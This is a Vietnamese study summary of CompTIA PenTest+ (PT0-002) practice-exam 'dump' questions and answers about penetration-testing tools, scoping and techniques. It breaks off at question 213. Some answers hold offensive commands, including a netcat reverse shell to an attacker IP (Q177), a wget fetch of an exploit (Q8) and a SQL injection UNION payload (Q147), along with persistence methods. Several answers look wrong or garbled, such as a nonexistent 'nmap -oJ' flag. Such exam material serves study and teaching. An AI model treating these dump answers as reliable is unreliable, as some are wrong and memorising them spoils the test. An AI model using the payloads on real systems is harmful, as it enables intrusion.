Tổng Quan Về CompTIA Pentest+ (PT0-002) Practice Test (DUMP)

Tổng Quan Về CompTIA Pentest+ (PT0-002) Practice Test (DUMP)

Đây là những ý chính từ tài liệu ôn thi, giúp các bạn nhanh chóng nắm những điểm quan trong của bài thi.   CompTIA Pentest + (PT0-002)  Sau khi đọc hãy  quay lại các câu hỏi và cuối cùng là làm Exam Simulation với Test Engine.

 

Câu 1:

Hỏi: Lệnh nào cho phép file script.sh được thực thi bởi người sở hữu?
Đáp án: chmod u+x script.sh.


Câu 2:

Hỏi: Một tester dùng lệnh để xóa lịch sử Bash. Họ đang làm gì?
Đáp án: Xóa dấu vết bằng cách xóa lịch sử Bash.


Câu 3:

Hỏi: Bài kiểm tra bảo mật dựa trên tuân thủ tập trung vào điều gì?
Đáp án: Xác định hiệu quả của một bộ tiêu chuẩn bảo mật cụ thể.


Câu 4:

Hỏi: Lợi ích lớn nhất của MITRE ATT&CK Framework?
Đáp án: Hiểu chiến thuật xâm nhập để ngăn chặn chúng.


Câu 5:

Hỏi: OWASP Top 10 mô tả điều gì? (Chọn 2)
Đáp án:

  1. Rủi ro nghiêm trọng nhất của ứng dụng web.
  2. Các rủi ro được xếp hạng theo mức độ quan trọng.

Câu 6:

Hỏi: Cách khai thác tốt nhất từ lỗ hổng upload path?
Đáp án: Chỉnh sửa file smb.conf và upload lại lên server.


Câu 7:

Hỏi: Khi kiểm tra dữ liệu trên cloud, điều gì cần kiểm tra đầu tiên?
Đáp án: Dữ liệu nhạy cảm có công khai hay không.


Câu 8:

Hỏi: Cách tải file exploit từ máy chủ staging?
Đáp án: wget 10.10.51.50:9891/exploit.


Câu 9:

Hỏi: Sau khi sử dụng exploit, cần làm gì?
Đáp án: Xóa file /tmp/apache.


Câu 10:

Hỏi: Báo cáo kiểm tra tĩnh nên chứa gì?
Đáp án: Ngữ cảnh mã liên quan đến các thao tác typecasting không an toàn.


Câu 11:

Hỏi: Remediate lỗ hổng cao nhất liên quan đến certificate?
Đáp án:

  1. Tạo CSR.
  2. Gửi CSR đến CA và cài đặt lại certificate mới.

Câu 12:

Hỏi: Công cụ nào để đánh giá nhận thức bảo mật của nhân viên?
Đáp án: SET.


Câu 13:

Hỏi: Lỗ hổng phổ biến nhất của thiết bị IoT?
Đáp án: Mật khẩu mặc định.


Câu 14:

Hỏi: Lệnh sdelete mimikatz.* làm gì?
Đáp án: Xóa các công cụ khỏi server.


Câu 15:

Hỏi: Nmap command tốt nhất để tìm các port dễ bị khai thác?
Đáp án: nmap 192.168.1.1-5 -PS22-25,80.


Câu 16:

Hỏi: Tại sao URL không trả về kết quả như mong đợi?
Đáp án: URI trả về lỗi server.


Câu 17:

Hỏi: Sinkholing IP của tester, nguyên nhân?
Đáp án: Quá trình lập kế hoạch không thông báo đầy đủ các nhóm.


Câu 18:

Hỏi: WPScan và SQLmap được dùng để làm gì?
Đáp án: Xác định tất cả các lỗ hổng trong hệ thống.


Câu 19:

Hỏi: Tìm danh bạ nhân viên từ bản sao cũ?
Đáp án: Web archive.


Câu 20:

Hỏi: Cách xác định CVE liên quan đến SSH trên server Linux?
Đáp án: nmap --script vulners.

Câu 21:

Hỏi: Cách tốt nhất để đảm bảo lỗ hổng là true positive?
Đáp án: Thực hiện kiểm tra thủ công trên server.


Câu 22:

Hỏi: Kỹ thuật nào có khả năng thành công cao nhất để truy cập hệ thống tài chính?
Đáp án: Thực hiện spear phishing giả mạo quản lý cấp cao.


Câu 23:

Hỏi: Yếu điểm nào của WiFi dễ bị brute-force nhất?
Đáp án: WPS.


Câu 24:

Hỏi: Script được viết để làm gì?
Đáp án: Xác định các host hoạt động trên mạng.


Câu 25:

Hỏi: Sau khi hoàn thành báo cáo, cần làm gì?
Đáp án: Xóa thông tin đăng nhập được tạo bởi tester.


Câu 26:

Hỏi: Công cụ nào phù hợp để tạo phản hồi truy vấn DNS tùy chỉnh?
Đáp án: Scapy.


Câu 27:

Hỏi: Bài kiểm tra với thông tin công khai thuộc loại nào?
Đáp án: Kiểm tra môi trường không xác định.


Câu 28:

Hỏi: Dòng nào trong mã Python dẫn đến cảnh báo IDS "probable port scan"?
Đáp án: Dòng 08.


Câu 29:

Hỏi: Điều gì cần có trong ROE?
Đáp án: Hạn chế kiểm tra.


Câu 30:

Hỏi: Điều quan trọng nhất cần xác định đầu tiên khi khách hàng không muốn báo cáo hàng ngày?
Đáp án: Ngưỡng rủi ro để thông báo ngay.


Câu 31:

Hỏi: Module nào trong Pacu để xác định quyền của user?
Đáp án: iam_enum_permissions.


Câu 32:

Hỏi: Làm gì khi hệ thống báo động được kích hoạt trong bài kiểm tra?
Đáp án: Deconflict với penetration tester.


Câu 33:

Hỏi: Công cụ nào phù hợp để thực hiện reconnaissance với camera an ninh?
Đáp án: Shodan.


Câu 34:

Hỏi: Responder được dùng để thu thập gì?
Đáp án: Hash của người dùng gửi qua SMB.


Câu 35:

Hỏi: Công cụ nào phù hợp để redirect scanning tools qua TCP port 1080?
Đáp án: ProxyChains.


Câu 36:

Hỏi: Làm gì khi phát hiện lỗ hổng nghiêm trọng đang bị khai thác?
Đáp án: Liên hệ ngay với đầu mối liên lạc chính.


Câu 37:

Hỏi: Công cụ mở file .pcap để xem thông tin xác thực?
Đáp án: Wireshark.


Câu 38:

Hỏi: Tại sao tất cả port bị lọc trong lần quét thứ hai của Nmap?
Đáp án: Firewall hoặc IPS đã chặn quá trình quét.


Câu 39:

Hỏi: Phương pháp tốt nhất để kiểm tra dịch vụ TCP chuyên biệt có thể mở cửa vật lý?
Đáp án: Viết script Lua sử dụng với NSE.


Câu 40:

Hỏi: Rủi ro bổ sung khi kiểm tra SCADA?
Đáp án: Thiết bị có thể gây ảnh hưởng đến thế giới vật lý.

Câu 41:

Hỏi: Nmap scan nào phù hợp để tránh báo động và phản ứng?
Đáp án: nmap -sS -O 192.168.1.2/24 -T1.


Câu 42:

Hỏi: Làm gì khi phát hiện một dải IP không xác định thông qua VPN tunnel?
Đáp án: Ngừng kiểm tra và thông báo với liên hệ khẩn cấp.


Câu 43:

Hỏi: Tester tặng ổ cứng gắn ngoài có chứa mã độc. Đây là kiểu tấn công gì?
Đáp án: Baiting.


Câu 44:

Hỏi: Hành động nào hợp lý khi khai thác lỗ hổng SQL database trong mạng nội bộ?
Đáp án: Khai thác điểm yếu cấu hình trong cơ sở dữ liệu SQL.


Câu 45:

Hỏi: Cách khai thác NTLM challenge-response traffic?
Đáp án: Sử dụng tấn công pass-the-hash.


Câu 46:

Hỏi: Tài liệu nào mô tả hoạt động, kết quả và lịch trình cho tester?
Đáp án: SOW (Statement of Work).


Câu 47:

Hỏi: Công cụ tốt nhất để kiểm tra sâu một trang web?
Đáp án: WPScan.


Câu 48:

Hỏi: Hoàn thiện script để thực hiện port scanning trong mạng?
Đáp án:

  1. Lệnh scan: nmap 192.168.2.2 -sV -O.
  2. Vấn đề cần kiểm tra: Quyền SMB yếu.

Câu 49:

Hỏi: Tester tìm thấy file chứa mật khẩu rõ. Hành động tiếp theo?
Đáp án: Ghi nhận trong báo cáo kiểm tra.


Câu 50:

Hỏi: Đầu script Bash nên dùng ký tự gì để chỉ định trình thông dịch?
Đáp án: #!.


Câu 51:

Hỏi: Kỹ thuật nào để gửi traffic với double tagging?
Đáp án: Tag nesting.


Câu 52:

Hỏi: Cách sửa script Python để kiểm tra user context của server?
Đáp án: Chèn lệnh id;whoami vào script.


Câu 53:

Hỏi: Công cụ reconnaissance thụ động nào phù hợp? (Chọn 2)
Đáp án:

  1. Wireshark.
  2. Shodan.

Câu 54:

Hỏi: Lệnh Nmap nào ít khả năng bị IDS phát hiện?
Đáp án: nmap -f --badsum 192.168.1.10.


Câu 55:

Hỏi: Làm gì để ép các thiết bị kết nối với rogue AP?
Đáp án: Gửi deauthentication frames.


Câu 56:

Hỏi: Sử dụng port scan kết quả từ Nmap, xác định vector tấn công?
Đáp án: Quyền SMB yếu.


Câu 57:

Hỏi: Phương pháp bảo mật email với tính bảo mật khi truyền tải?
Đáp án: S/MIME.


Câu 58:

Hỏi: Khuyến nghị nào khi mật khẩu bị crack dễ dàng bằng rainbow table?
Đáp án: Yêu cầu thuật toán mạnh hơn.


Câu 59:

Hỏi: Công cụ tốt nhất để kiểm tra URL có lỗ hổng SQL?
Đáp án: SQLmap.


Câu 60:

Hỏi: Cách Nmap thực hiện ping scan nhanh?
Đáp án: nmap -sn 10.12.1.0/24.

Câu 61:

Hỏi: Công cụ tốt nhất để thu thập thông tin IoT trong reconnaissance thụ động?
Đáp án: Shodan.


Câu 62:

Hỏi: Điều cần kiểm tra đầu tiên khi làm penetration test trên môi trường cloud?
Đáp án: Xác minh nhà cung cấp cloud cho phép kiểm tra.


Câu 63:

Hỏi: Phân tích HTTP payload để xác định loại tấn công và cách khắc phục?
Đáp án: Tùy thuộc loại tấn công được chỉ ra trong payload.


Câu 64:

Hỏi: Công cụ dùng sau lệnh unshadow để crack mật khẩu?
Đáp án: John the Ripper.


Câu 65:

Hỏi: File nào từ kết quả dirb có khả năng chứa thông tin hữu ích nhất?
Đáp án: File about.


Câu 66:

Hỏi: Công cụ tốt nhất để thiết lập rogue AP trên mạng?
Đáp án: Aircrack-ng.


Câu 67:

Hỏi: Cách duy trì quyền truy cập trên Windows workstation?
Đáp án: Tạo scheduled task chạy tệp độc hại khi khởi động.


Câu 68:

Hỏi: Điều hợp lý nhất khi kiểm tra SCADA trong mạng nội bộ?
Đáp án: Controllers không xác minh nguồn gốc lệnh.


Câu 69:

Hỏi: Làm cách nào kiểm tra ứng dụng Java có sử dụng mã hóa trên socket?
Đáp án: Chạy Wireshark để bắt gói tin và quan sát.


Câu 70:

Hỏi: Tại sao cần quy định thời gian phù hợp khi lập kế hoạch kiểm tra?
Đáp án: Tránh gây ảnh hưởng đến hoạt động mạng và kinh doanh.


Câu 71:

Hỏi: Điều cần tránh khi kiểm tra ứng dụng trên môi trường shared cloud?
Đáp án: Gửi nhiều request mỗi giây để kiểm tra DDoS protection.


Câu 72:

Hỏi: Tester cần xóa gì sau khi kết thúc bài kiểm tra? (Chọn 2)
Đáp án:

  1. Shell được tạo ra.
  2. Tài khoản được tạo bởi tester.

Câu 73:

Hỏi: Fuzzing trên phần mềm thường tìm thấy loại lỗ hổng nào?
Đáp án: Buffer overflow.


Câu 74:

Hỏi: Email phishing nhắm mục tiêu sử dụng yếu tố nào để tăng hiệu quả?
Đáp án: Quyền lực và tính khẩn cấp.


Câu 75:

Hỏi: Thay đổi giá trị id trong URL để truy cập ứng dụng là lỗ hổng gì?
Đáp án: Direct object reference.


Câu 76:

Hỏi: Khi nào cần xác thực lại bài kiểm tra bảo mật trước đó?
Đáp án: Sau khi phát hiện một vụ vi phạm.


Câu 77:

Hỏi: Tester đang thực hiện gì khi chạy các lệnh tạo chia sẻ trên remote? (Chọn 2)
Đáp án:

  1. Tạo chia sẻ trên hệ thống từ xa.
  2. Thực thi file trên hệ thống từ xa.

Câu 78:

Hỏi: Tại sao PowerShell không kết nối RDP khi quét Nmap thấy mở port?
Đáp án: Địa chỉ IP không chính xác.


Câu 79:

Hỏi: Loại kiểm tra nào có khả năng gây hại cho môi trường ICS?
Đáp án: Active scanning.


Câu 80:

Hỏi: Tấn công Bluesnarfing thường thực hiện điều gì?
Đáp án: Dump sổ địa chỉ của thiết bị.

Câu 81:

Hỏi: Sau khi báo cáo kết quả kiểm tra, bước tiếp theo là gì?
Đáp án: Attestation of findings và gửi báo cáo.


Câu 82:

Hỏi: Tester phát hiện backdoor đã tồn tại trong server. Làm gì tiếp theo?
Đáp án: Thông báo ngay với khách hàng.


Câu 83:

Hỏi: Đội hunt team quan tâm điều gì nhất trong báo cáo cuối cùng?
Đáp án: Tactics, Techniques, and Procedures (TTPs).


Câu 84:

Hỏi: Điều gì cần xem xét trước khi quét OS và port scan trên hệ thống cũ?
Đáp án: Kiểm kê tài sản và phiên bản hiện có.


Câu 85:

Hỏi: Công cụ khai thác nào có bộ module payload rộng nhất?
Đáp án: Metasploit.


Câu 86:

Hỏi: Công cụ nào dễ dàng thao tác header TCP để kiểm tra phản hồi?
Đáp án: Scapy.


Câu 87:

Hỏi: Tester phát hiện malware trong ứng dụng được kiểm tra. Làm gì tiếp theo?
Đáp án: Dừng bài kiểm tra và thông báo với liên hệ khẩn cấp.


Câu 88:

Hỏi: Tấn công nào có thể được thực hiện khi ICMP bị vô hiệu hóa?
Đáp án: Fraggle.


Câu 89:

Hỏi: Script đang thực hiện gì?
Đáp án: Quét mạng để tìm cổng mở cụ thể.


Câu 90:

Hỏi: Công cụ nào kiểm tra lỗ hổng dựa trên kết quả quét Nmap?
Đáp án: OpenVAS.


Câu 91:

Hỏi: Lệnh nào tiếp theo tốt nhất để tiến sâu vào mạng từ CentOS bị khai thác?
Đáp án: nc 127.0.0.1 5555.


Câu 92:

Hỏi: Dịch vụ nào có khả năng bị khai thác nhiều nhất từ kết quả quét Nmap? (Chọn 2)
Đáp án:

  1. HTTP.
  2. DNS.

Câu 93:

Hỏi: Các biểu thức Python nào tăng giá trị biến val lên 1? (Chọn 2)
Đáp án:

  1. val=(val+1).
  2. val+=1.

Câu 94:

Hỏi: Lệnh Nmap nào có khả năng ít bị phát hiện nhất?
Đáp án: nmap -T0 192.168.0.1.


Câu 95:

Hỏi: Script đang thực hiện hành động gì?
Đáp án: Tìm cổng mở.


Câu 96:

Hỏi: Sau khi báo cáo kết quả với khách hàng, bước tiếp theo là gì?
Đáp án: Khắc phục các lỗ hổng được báo cáo.


Câu 97:

Hỏi: Khi nào cần thông báo khẩn cấp với khách hàng?
Đáp án: Phát hiện kẻ tấn công khác trong mạng.


Câu 98:

Hỏi: Kỹ thuật tốt nhất để xác định plaintext từ một danh sách string mã hóa?
Đáp án: Rainbow table attack.


Câu 99:

Hỏi: Tại sao script Python lại kích hoạt cảnh báo "probable port scan"?
Đáp án: Dòng *range(1, 1025) tạo danh sách port theo thứ tự số.


Câu 100:

Hỏi: Điều gì quan trọng nhất khi kiểm tra xâm nhập vào văn phòng ngoài giờ? (Chọn 2)
Đáp án:

  1. Liên hệ chính của khách hàng.
  2. Tài liệu liên quan đến phạm vi kiểm tra.

Câu 101:

Hỏi: Hệ điều hành nào phù hợp nhất với kết quả scan từ Nmap?
Đáp án: Windows Server.


Câu 102:

Hỏi: Cách tốt nhất để lấy thông tin đăng nhập FTP trong một on-path attack?
Đáp án: Sử dụng Wireshark để bắt traffic.


Câu 103:

Hỏi: Ghép nối các giá trị chuỗi được gọi là gì?
Đáp án: Concatenation.


Câu 104:

Hỏi: Nguyên nhân nào khả thi nhất khi ARP cache bị poison?
Đáp án: Thiết bị trên mạng đã poison ARP cache.


Câu 105:

Hỏi: Rủi ro nào nằm trong OWASP Top 10 2017? (Chọn 2)
Đáp án:

  1. Cross-site scripting (XSS).
  2. Injection flaws.

Câu 106:

Hỏi: Thiết bị nào có khả năng là gateway với dịch vụ quản lý in-band?
Đáp án: Gateway có dịch vụ quản lý in-band.


Câu 107:

Hỏi: Yếu tố nào quan trọng nhất cần làm rõ trước khi bắt đầu kiểm tra?
Đáp án: Statement of Work (SOW).


Câu 108:

Hỏi: Hành động nào không phù hợp với SOW? (Chọn 2)
Đáp án:

  1. Không chia sẻ lỗ hổng nghiêm trọng với khách hàng.
  2. Tìm sự giúp đỡ từ diễn đàn ngầm bằng cách chia sẻ địa chỉ IP công khai.

Câu 109:

Hỏi: Sửa đổi nào cần thiết để script Perl hoạt động đúng?
Đáp án: Xóa dòng 3, 5 và 6.


Câu 110:

Hỏi: Công cụ nào tốt nhất để khai thác script PHP bị phát hiện?
Đáp án: Netcat và cURL.


Câu 111:

Hỏi: Cách duy trì quyền truy cập root trên server Linux sau reboot?
Đáp án: Tạo one-shot system service để thiết lập reverse shell.


Câu 112:

Hỏi: Lệnh nào giải mã nội dung file Base64?
Đáp án: echo U3VQZXIkM2NyZXQhCg== | base64 -d.


Câu 113:

Hỏi: Điều gì tốt nhất để xác định hệ thống trước khi kiểm tra?
Đáp án: Asset inventory.


Câu 114:

Hỏi: Kỹ thuật reconnaissance thụ động nào hiệu quả nhất?
Đáp án: Scrape web presences và mạng xã hội.


Câu 115:

Hỏi: Điều gì xảy ra khi khách hàng muốn tập trung vào một khu vực mạng cụ thể?
Đáp án: Reprioritizing goals/objectives.


Câu 116:

Hỏi: Công cụ nào tốt nhất để kiểm tra ứng dụng web thủ công? (Chọn 2)
Đáp án:

  1. OWASP ZAP.
  2. Burp Suite.

Câu 117:

Hỏi: Điều gì có thể xảy ra khi quét mạng ICS?
Đáp án: Gây ra lỗi không mong muốn trong hệ thống điều khiển.


Câu 118:

Hỏi: Framework nào cung cấp ma trận chiến thuật và kỹ thuật của attacker?
Đáp án: MITRE ATT&CK Framework.


Câu 119:

Hỏi: Nmap command nào kiểm tra OS và phiên bản Apache trên server?
Đáp án: nmap -A -T4 -p80 192.168.1.20.


Câu 120:

Hỏi: Lệnh nào được sử dụng để xác thực tài khoản user trên SMTP server?
Đáp án: VRFY và EXPN.

Câu 121:

Hỏi: Bước đầu tiên để lên kế hoạch reconnaissance với ít thông tin nhất?
Đáp án: Check WHOIS và netblock records của công ty.


Câu 122:

Hỏi: Làm cách nào để trực quan hóa thông tin authorization được truyền tải?
Đáp án: Giải mã header authorization bằng Base64.


Câu 123:

Hỏi: Kỹ thuật nào giúp truy cập tòa nhà bằng cách sao chép thẻ nhân viên?
Đáp án: Badge cloning.


Câu 124:

Hỏi: Công cụ nào dùng để tìm thông tin ẩn trong tài liệu trên web?
Đáp án: FOCA.


Câu 125:

Hỏi: Làm gì tiếp theo khi đã có quyền truy cập email CEO?
Đáp án: Gửi email yêu cầu tạo tài khoản mới.


Câu 126:

Hỏi: Công cụ tốt nhất để kiểm tra lỗ hổng web server?
Đáp án: Nikto.


Câu 127:

Hỏi: Công cụ tốt nhất để thiết lập rogue AP trên mạng?
Đáp án: Aircrack-ng.


Câu 128:

Hỏi: Cách thực hiện Nmap scan tránh kích hoạt báo động?
Đáp án: nmap -sS -O 192.168.1.0/24 -T1.


Câu 129:

Hỏi: Lý do ứng dụng không chấp nhận chứng chỉ SSL do tester tạo?
Đáp án: Ứng dụng đã cài đặt API certificate pinning.


Câu 130:

Hỏi: Công cụ tốt nhất để khai thác lỗ hổng SQL trên database server?
Đáp án: SQLmap.


Câu 131:

Hỏi: Mối lo ngại lớn nhất với VM khi dùng tài nguyên chung?
Đáp án: Side channel attack.


Câu 132:

Hỏi: Khái niệm nào định nghĩa các bước cụ thể trong bài kiểm tra?
Đáp án: Methodology.


Câu 133:

Hỏi: Cách tốt nhất để đạt cả hai mục tiêu: truy cập thiết bị và trích xuất dữ liệu?
Đáp án: Gửi SMS giả mạo số dịch vụ với link tải ứng dụng độc hại.


Câu 134:

Hỏi: OS nào có khả năng cao nhất trả về gói TTL 128 trong lệnh ping?
Đáp án: Windows.


Câu 135:

Hỏi: Kỹ thuật nào giúp truy cập văn phòng khi không bị chú ý? (Chọn 2)
Đáp án:

  1. Badge stealing.
  2. Tailgating.

Câu 136:

Hỏi: Loại tấn công nào được thể hiện qua logs khi nhiều parameter bị thay đổi?
Đáp án: Parameter pollution.


Câu 137:

Hỏi: Điều gì cần thiết trước khi bắt đầu bài kiểm tra khi bị trễ thời gian?
Đáp án: Liên hệ khẩn cấp chính xác của khách hàng.


Câu 138:

Hỏi: Kiểm soát kỹ thuật đầu tiên cần áp dụng cho một thiết bị mạng?
Đáp án: System-hardening techniques.


Câu 139:

Hỏi: Cách nào tốt nhất để thực thi binary trên Windows qua wmic.exe?
Đáp án: PowerShell modules.


Câu 140:

Hỏi: Làm gì khi phát hiện admin exfiltrate dữ liệu công ty?
Đáp án: Escalate vấn đề ngay lập tức.

Câu 141:

Hỏi: Công cụ nào nên được sử dụng đầu tiên để kiểm tra e-commerce application?
Đáp án: OWASP ZAP.


Câu 142:

Hỏi: Tài liệu nào quy định cách quản lý thông tin trước, trong và sau kiểm tra?
Đáp án: NDA.


Câu 143:

Hỏi: Lệnh nào cần thử tiếp theo sau kết quả scan từ Nmap?
Đáp án: ftp 192.168.53.23.


Câu 144:

Hỏi: Cách lưu kết quả port scan vào file ở định dạng có thể trao đổi?
Đáp án: nmap -A 192.168.0.10-100 -oX results.


Câu 145:

Hỏi: Phương pháp nào thu thập email mà không kích hoạt công cụ bảo mật? (Chọn 2)
Đáp án:

  1. Scraping social media sites.
  2. Using WHOIS lookup tool.

Câu 146:

Hỏi: Tài liệu nào định nghĩa domain, IP ranges, hosts, và applications?
Đáp án: ROE (Rules of Engagement).


Câu 147:

Hỏi: Lệnh nào khai thác lỗ hổng hiển thị lỗi SQL trong web application?
Đáp án: 1 UNION SELECT 1, DATABASE(), 3 --.


Câu 148:

Hỏi: Cách tốt nhất redirect HTTP connections tới IP giả mạo?
Đáp án: Khai thác DNS server để thêm/ cập nhật bản ghi A giả mạo.


Câu 149:

Hỏi: Báo cáo bảo mật ứng dụng gửi đến developer nên chứa gì? (Chọn 2)
Đáp án:

  1. Poor input sanitization.
  2. Null pointer dereferences.

Câu 150:

Hỏi: Công cụ nào kiểm tra nếu mật khẩu người dùng giống nhau trên nhiều hệ thống?
Đáp án: Hydra.


Câu 151:

Hỏi: Khuyến nghị nào cần đưa vào báo cáo sau khi kiểm tra thiết bị mạng? (Chọn 2)
Đáp án:

  1. Tạo mạng out-of-band cho quản lý.
  2. Triển khai phương pháp xác thực tốt hơn.

Câu 152:

Hỏi: Tester nên làm gì sau khi kết thúc kiểm tra trên một mục tiêu? (Chọn 2)
Đáp án:

  1. Xóa mọi công cụ hoặc script đã cài đặt.
  2. Xóa các tài khoản được tạo ra.

Câu 153:

Hỏi: Vấn đề nào tiềm năng từ kết quả DNS reconnaissance?
Đáp án: Ít nhất một bản ghi nằm ngoài phạm vi kiểm tra.


Câu 154:

Hỏi: Công cụ reconnaissance active tốt nhất để quét port?
Đáp án: Nmap.


Câu 155:

Hỏi: Khi nào cần deconfliction trong penetration test?
Đáp án: Kiểm tra trùng thời gian với cuộc điều tra pháp lý hình sự.


Câu 156:

Hỏi: Công cụ nào tốt nhất để kiểm tra brute-force mật khẩu SSH?
Đáp án: Patator.


Câu 157:

Hỏi: Yêu cầu PCI DSS đối với quá trình kiểm tra bảo mật?
Đáp án: Mạng phải được phân đoạn.


Câu 158:

Hỏi: Sau khi báo cáo và xóa tài khoản tester, điều gì xảy ra tiếp theo?
Đáp án: Khách hàng áp dụng các bản vá lỗ hổng.


Câu 159:

Hỏi: Lệnh nào thực hiện quét nhanh Class C network để xác định host?
Đáp án: nmap -sn 192.168.0.0/24.


Câu 160:

Hỏi: Công cụ nào hỗ trợ phân tích sâu tệp nhật ký hoặc dữ liệu mạng?
Đáp án: Wireshark.

Câu 161:

Hỏi: Công cụ nào dùng để thực hiện đánh giá phần mềm ứng dụng web?
Đáp án: Burp Suite.


Câu 162:

Hỏi: Lệnh Nmap nào kiểm tra service versions nhanh nhất?
Đáp án: nmap -sV 192.168.1.1.


Câu 163:

Hỏi: Phương pháp tốt nhất để kiểm tra cấu hình máy chủ SNMP?
Đáp án: Sử dụng công cụ SNMPWalk.


Câu 164:

Hỏi: Công cụ nào kiểm tra và ghi lại lỗ hổng cơ sở dữ liệu NoSQL?
Đáp án: NoSQLMap.


Câu 165:

Hỏi: Tại sao cần kiểm tra lịch sử Bash sau cuộc kiểm tra?
Đáp án: Xóa hoặc bảo mật các lệnh nhạy cảm đã thực thi.


Câu 166:

Hỏi: Phương pháp tốt nhất để kiểm tra tính toàn vẹn của hệ thống file?
Đáp án: Chạy tripwire.


Câu 167:

Hỏi: Lệnh nào thực hiện kiểm tra ngầm port HTTP/HTTPS?
Đáp án: nmap -p 80,443 -T0.


Câu 168:

Hỏi: Điều gì cần làm sau khi phát hiện dịch vụ FTP dùng mật khẩu mặc định?
Đáp án: Đưa vào báo cáo và khuyến nghị vô hiệu hóa hoặc thay đổi mật khẩu.


Câu 169:

Hỏi: Công cụ nào dùng để mô phỏng tấn công brute-force qua HTTP form?
Đáp án: Burp Suite Intruder.


Câu 170:

Hỏi: Tấn công nào khai thác việc không kiểm tra xác thực đầu vào?
Đáp án: SQL Injection.


Câu 171:

Hỏi: Lệnh nào ghi kết quả quét Nmap vào file định dạng JSON?
Đáp án: nmap -oJ results.json 192.168.0.1.


Câu 172:

Hỏi: Công cụ nào được dùng để kiểm tra sức mạnh của chứng chỉ SSL?
Đáp án: SSL Labs.


Câu 173:

Hỏi: Điều gì cần làm trước khi bắt đầu kiểm tra ứng dụng trên cloud?
Đáp án: Xác nhận phạm vi và sự cho phép của nhà cung cấp cloud.


Câu 174:

Hỏi: Phương pháp nào kiểm tra tính bảo mật của SSH trên hệ thống?
Đáp án: Chạy ssh-audit.


Câu 175:

Hỏi: Lệnh nào phát hiện thông tin phiên bản dịch vụ trên cổng TCP?
Đáp án: nmap -sV -p <port>.


Câu 176:

Hỏi: Cách nào phân tích lưu lượng HTTP để xác định mã độc?
Đáp án: Sử dụng Wireshark với bộ lọc http.


Câu 177:

Hỏi: Lệnh nào tạo reverse shell trên Windows?
Đáp án: nc -e cmd.exe <attacker_IP> <port>.


Câu 178:

Hỏi: Làm gì khi phát hiện credential leak qua HTTP header?
Đáp án: Thông báo cho khách hàng và đề xuất mã hóa thông qua HTTPS.


Câu 179:

Hỏi: Công cụ nào được dùng để đánh giá giao thức SMB?
Đáp án: SMBClient.


Câu 180:

Hỏi: Phương pháp nào kiểm tra cấu hình DNS của hệ thống?
Đáp án: Sử dụng dig và kiểm tra các bản ghi.

Câu 181:

Hỏi: Lệnh nào trong Nmap quét toàn bộ dải port TCP?
Đáp án: nmap -p- 192.168.0.1.


Câu 182:

Hỏi: Tại sao cần phân tích log hệ thống sau khi kiểm tra?
Đáp án: Xác định và ghi nhận các hoạt động bất thường.


Câu 183:

Hỏi: Công cụ nào tốt nhất để phân tích nội dung file .har?
Đáp án: Burp Suite.


Câu 184:

Hỏi: Tấn công nào khai thác lỗi xử lý input từ người dùng?
Đáp án: Command Injection.


Câu 185:

Hỏi: Lệnh nào giúp kiểm tra dịch vụ DNS đang hoạt động?
Đáp án: nslookup hoặc dig.


Câu 186:

Hỏi: Phương pháp tốt nhất để kiểm tra dịch vụ RDP có bảo mật?
Đáp án: Chạy kiểm tra với rdp-sec-check.


Câu 187:

Hỏi: Công cụ nào dùng để tấn công brute-force trên web form?
Đáp án: Hydra.


Câu 188:

Hỏi: Phương pháp nào tốt nhất để phân tích file log tấn công mạng?
Đáp án: Splunk hoặc ELK stack.


Câu 189:

Hỏi: Tại sao cần xác nhận thông tin đăng nhập trước khi kiểm tra?
Đáp án: Đảm bảo quyền truy cập và tính hợp lệ của kiểm tra.


Câu 190:

Hỏi: Công cụ nào dùng để phân tích và kiểm tra lỗ hổng NoSQL?
Đáp án: NoSQLMap.


Câu 191:

Hỏi: Phương pháp tốt nhất để phân tích sự cố mạng nội bộ?
Đáp án: Wireshark với các bộ lọc tương ứng.


Câu 192:

Hỏi: Lệnh nào kiểm tra giao thức HTTP/2 trên server?
Đáp án: curl -I --http2 <server>.


Câu 193:

Hỏi: Công cụ nào phù hợp nhất để kiểm tra tính toàn vẹn của hệ thống?
Đáp án: Tripwire.


Câu 194:

Hỏi: Kỹ thuật nào khai thác việc sử dụng mật khẩu mặc định?
Đáp án: Password Spraying.


Câu 195:

Hỏi: Phương pháp nào phân tích yêu cầu HTTP độc hại?
Đáp án: Sử dụng Burp Suite.


Câu 196:

Hỏi: Làm thế nào để kiểm tra dịch vụ NTP?
Đáp án: ntpq -p.


Câu 197:

Hỏi: Công cụ nào phù hợp để thực hiện phishing simulation?
Đáp án: Social-Engineer Toolkit (SET).


Câu 198:

Hỏi: Công cụ nào phù hợp để kiểm tra lưu lượng DNS?
Đáp án: Wireshark với bộ lọc dns.


Câu 199:

Hỏi: Kỹ thuật nào tốt nhất để kiểm tra hash mật khẩu?
Đáp án: John the Ripper.


Câu 200:

Hỏi: Lệnh nào kiểm tra máy chủ có mở giao thức SNMP?
Đáp án: nmap -sU -p 161 <IP>.

Câu 201:

Hỏi: Công cụ nào được dùng để kiểm tra giao thức SMTP?
Đáp án: Telnet hoặc Nmap.


Câu 202:

Hỏi: Phương pháp tốt nhất để kiểm tra các bản ghi MX của DNS?
Đáp án: Sử dụng dig mx <domain>.


Câu 203:

Hỏi: Công cụ nào phù hợp để kiểm tra cấu hình TLS?
Đáp án: SSL Labs hoặc OpenSSL.


Câu 204:

Hỏi: Tấn công nào khai thác lỗ hổng XSS?
Đáp án: Chèn mã JavaScript độc hại vào input form.


Câu 205:

Hỏi: Làm thế nào để phát hiện dịch vụ SNMP với thông tin cấu hình yếu?
Đáp án: Chạy snmpwalk hoặc snmp-check.


Câu 206:

Hỏi: Công cụ nào để thực hiện kiểm tra lỗ hổng bảo mật qua API?
Đáp án: Postman hoặc Burp Suite.


Câu 207:

Hỏi: Phương pháp tốt nhất để kiểm tra tính bảo mật của giao thức SSH?
Đáp án: Chạy ssh-audit.


Câu 208:

Hỏi: Tấn công nào khai thác việc lưu mật khẩu trong cookies?
Đáp án: Cookie Hijacking.


Câu 209:

Hỏi: Lệnh nào kiểm tra port UDP đang hoạt động?
Đáp án: nmap -sU <IP>.


Câu 210:

Hỏi: Công cụ nào phù hợp để thực hiện kiểm tra và phát hiện giao thức IPv6?
Đáp án: Nmap hoặc Wireshark.


Câu 211:

Hỏi: Lệnh nào kiểm tra kết nối LDAP trên server?
Đáp án: ldapsearch hoặc nmap -p 389 <IP>.


Câu 212:

Hỏi: Công cụ nào phù hợp để kiểm tra DNS zone transfer?
Đáp án: Dig hoặc Nslookup.


Câu 213:

Hỏi: Lệnh nào kiểm tra phiên bản cụ thể của MySQL?
